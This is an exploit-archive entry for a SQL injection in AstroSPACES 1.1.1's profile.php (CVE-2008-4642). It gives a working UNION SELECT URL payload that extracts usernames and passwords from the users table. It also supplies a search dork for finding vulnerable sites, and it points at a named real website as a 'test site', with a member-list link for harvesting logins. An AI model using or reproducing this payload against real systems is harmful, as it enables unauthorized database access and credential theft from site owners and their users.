AstroSPACES 1.1.1 - 'id' SQL Injection

Author: TurkishWarriorr
type: webapps
platform: php
port: 
date_added: 2008-10-14 
date_updated: 2017-01-02 
verified: 1 
codes: OSVDB-49142;CVE-2008-4642 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comastrospaces_1.1.1.zip

# AstroSPACES (profile.php) SQL

  Powered by Philippine Website Developers and AstroSPACES Â© P3NET 2006-2007
#########################################################################
#
# AUTHOR : TurkishWarriorr  (Sehitler Ã–lmez Vatan BÃ¶lÃ¼nmez ....)
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORK : Powered By AstroSPACES
#
##########################################################################
EXPLOIT :

profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--


test sites:

http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--


E mail login :

http://quirino.com.ph/friendster/space.php?action=memberlist

##########################################################################
                               www.1923turk.org
                        turkish-warriorr@hotmail.com

# milw0rm.com [2008-10-15]